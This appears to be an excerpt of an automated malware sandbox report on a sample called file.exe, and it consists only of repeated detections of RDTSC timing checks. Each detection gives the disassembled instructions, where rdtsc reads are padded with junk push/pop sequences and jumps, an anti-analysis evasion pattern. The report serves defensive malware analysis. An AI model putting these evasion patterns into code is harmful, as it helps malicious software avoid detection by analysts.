              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17B30 second address: D17B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17B34 second address: D17B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D188E6 second address: D1891B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D64E65h 0x00000009 jmp 00007FA1D8D64E68h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1891B second address: D18946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18347h 0x00000009 jmp 00007FA1D8D1833Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18DC3 second address: D18DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18DCE second address: D18DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18DD2 second address: D18DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18DDD second address: D18DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18DE3 second address: D18DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18DE7 second address: D18E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18342h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1D8D18349h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18E1A second address: D18E30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FA1D8D64E56h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2222D second address: D22265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FA1D8D18340h 0x0000000b jmp 00007FA1D8D18345h 0x00000010 popad 0x00000011 jp 00007FA1D8D1833Ch 0x00000017 jnl 00007FA1D8D18336h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2240A second address: D2240E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D226E7 second address: D226ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D226ED second address: D226F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D226F9 second address: D226FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D226FD second address: D22701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22701 second address: D2270E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2270E second address: D22714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22883 second address: D22887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22887 second address: D228A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c jo 00007FA1D8D64E5Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D228A3 second address: D228A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D228A7 second address: D228AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22B65 second address: D22B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22DF9 second address: D22E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22E03 second address: D22E13 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1D8D18336h 0x00000008 jp 00007FA1D8D18336h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22E13 second address: D22E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA1D8D64E56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23612 second address: D23623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 jo 00007FA1D8D1833Ah 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28D67 second address: D28D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28D6D second address: D28D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28D71 second address: D28D92 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1D8D64E6Ch 0x00000008 jmp 00007FA1D8D64E66h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28A1D second address: D28A29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1D8D18336h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28A29 second address: D28A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b js 00007FA1D8D64E56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B614 second address: D2B61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B61A second address: D2B61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B61E second address: D2B63B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18346h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B7AD second address: D2B7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B7B3 second address: D2B7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FA1D8D18354h 0x0000000b ja 00007FA1D8D18336h 0x00000011 jmp 00007FA1D8D18348h 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B7E1 second address: D2B7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31E5D second address: D31E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18349h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31E7A second address: D31E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31E86 second address: D31EB7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1D8D18336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1D8D18348h 0x00000012 jno 00007FA1D8D1833Ch 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31EB7 second address: D31EE0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA1D8D64E5Fh 0x00000008 jmp 00007FA1D8D64E60h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31EE0 second address: D31EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31EE4 second address: D31EEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D315B1 second address: D315BB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1D8D1833Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31851 second address: D31856 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31856 second address: D31862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C943CD second address: C943D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C943D1 second address: C943D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C943D5 second address: C943DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D35161 second address: D35165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D35165 second address: D35169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3543E second address: D35444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3598A second address: D359A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D64E66h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A32C second address: D3A351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18347h 0x00000009 popad 0x0000000a push edx 0x0000000b jng 00007FA1D8D18336h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A351 second address: D3A39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FA1D8D64E66h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FA1D8D64E5Ch 0x00000019 pushad 0x0000001a jne 00007FA1D8D64E56h 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007FA1D8D64E63h 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A519 second address: D3A521 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A69C second address: D3A6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A6A0 second address: D3A6B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FA1D8D1833Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5C28 second address: CE5C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1BF9 second address: CA1C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FA1D8D18336h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C06 second address: CA1C44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FA1D8D64E5Fh 0x0000000a jmp 00007FA1D8D64E69h 0x0000000f jp 00007FA1D8D64E56h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C44 second address: CA1C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA1D8D18336h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C53 second address: CA1C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40F06 second address: D40F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 jp 00007FA1D8D18368h 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FA1D8D18336h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40F1C second address: D40F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41786 second address: D41792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA1D8D18336h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41792 second address: D41796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41FE3 second address: D42013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D18348h 0x00000009 jmp 00007FA1D8D18344h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4258F second address: D42595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42595 second address: D425B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FA1D8D18347h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42B87 second address: D42B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42B8B second address: D42B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42B97 second address: D42B9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42B9D second address: D42BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42BA3 second address: D42BB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FA1D8D64E56h 0x00000009 jns 00007FA1D8D64E56h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B04F second address: C9B053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B053 second address: C9B065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1D8D64E5Ah 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46CEC second address: D46CFA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46CFA second address: D46D06 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46D06 second address: D46D10 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1D8D18342h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46D10 second address: D46D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4C05E second address: D4C071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D1833Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53CE5 second address: D53CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA1D8D64E56h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51E06 second address: D51E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51E0A second address: D51E27 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA1D8D64E61h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51E27 second address: D51E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18349h 0x00000007 jmp 00007FA1D8D1833Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51E52 second address: D51E88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA1D8D64E56h 0x00000009 jmp 00007FA1D8D64E67h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1D8D64E63h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52022 second address: D52026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5252A second address: D5252E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5252E second address: D52543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D1833Bh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52543 second address: D52562 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA1D8D64E69h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D526D8 second address: D526F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D18344h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D526F0 second address: D526F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52986 second address: D5298D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5198A second address: D51995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D51995 second address: D5199B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5199B second address: D519A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C481 second address: D5C487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C487 second address: D5C490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C5F1 second address: D5C60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18343h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C60B second address: D5C617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA1D8D64E56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C778 second address: D5C797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FA1D8D18345h 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
